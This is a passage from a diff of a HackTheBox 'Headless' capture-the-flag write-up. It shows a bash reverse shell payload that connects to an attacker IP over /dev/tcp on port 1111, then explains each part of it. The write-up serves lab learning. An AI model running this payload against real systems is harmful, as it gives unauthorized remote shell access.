3v401/HackTheBox/Headless/README.md

 /bin/bash -c 'exec bash -i >& /dev/tcp/{IP}/1111 0>&1'
 ```

+Make the payload executable with `chmod +x payload.sh`.
+The content:

 1. `/bin/bash -c`: Tells the CLI to run the following command using the bash shell.
 2. `'exec bash -i >& /dev/tcp/{IP}/1111 0>&1'`: The core of the reverse shell command. `exec bash -i` This starts an interactive bash shell. `/dev/tcp/` is a Bash feature that allows TCP connections to be treated like files, when a program writes to this path it actually sends data over the network to the specified IP address and port ({IP}/1111). `0>&1`makes the standard input of the Bash shell read from the TCP connection.